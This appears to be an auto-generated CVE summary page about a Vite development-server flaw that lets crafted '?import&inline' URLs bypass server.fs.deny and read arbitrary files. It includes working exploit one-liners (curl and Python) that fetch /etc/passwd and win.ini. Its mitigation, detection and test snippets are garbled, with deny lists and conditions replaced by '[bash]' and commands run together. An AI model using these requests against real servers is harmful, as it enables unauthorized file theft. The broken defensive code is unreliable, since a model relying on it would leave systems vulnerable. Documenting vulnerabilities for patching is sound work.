How the CVE Works:
Vite’s development server fails to properly enforce `server.fs.deny` restrictions when processing requests containing `?import` query parameters combined with `inline` or `raw` modifiers. Attackers can bypass file access controls by crafting special URLs that combine these query parameters, allowing them to read arbitrary files from the server filesystem. The vulnerability specifically affects the dev server’s file serving endpoint when handling specially formatted requests like /@fs/path/to/file?import&?inline=1.wasm?init. This bypass occurs because the server incorrectly processes the query string sequence, failing to validate the requested file path against the deny list.
DailyCVE Form:
Platform: Vite
Version: 4.0.0-6.2.3
Vulnerability: FS deny bypass
Severity: Medium
Date: 2025-03-31
What Undercode Say:
Analytics:
- Attack Vector: Network
- Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
Exploit Commands:
curl "http://vite-dev-server:5173/@fs/etc/passwd?import&?inline=1.wasm?init"
python3 -c "import requests; print(requests.get('http://localhost:5173/@fs/C:/Windows/win.ini?raw&import').text)"
Protection Commands:
npm update vite --save-dev vite --version | grep -E '6.2.4|6.1.3|6.0.13|5.4.16|4.5.11'
Mitigation Code:
// vite.config.js
export default {
server: {
fs: {
strict: true,
deny: [bash]
}
}
}
Detection Script:
!/bin/bash VITE_VERSION=$(npm list vite | grep vite@ | cut -d@ -f2) if [bash]] || [bash]] || [bash]] || [bash]] || [bash]]; then echo "Vulnerable version detected" fi
Patch Verification:
// test-vite-fs.js
const vite = require('vite');
const config = vite.defineConfig({
server: { fs: { deny: [bash] }
});
const server = await vite.createServer(config);
const res = await fetch('http://localhost:5173/@fs/.secret?import&inline');
console.assert(res.status === 403, 'Vulnerable!');
References:
Reported By: https://github.com/advisories/GHSA-4r4m-qw57-chr8
Extra Source Hub:
Undercode
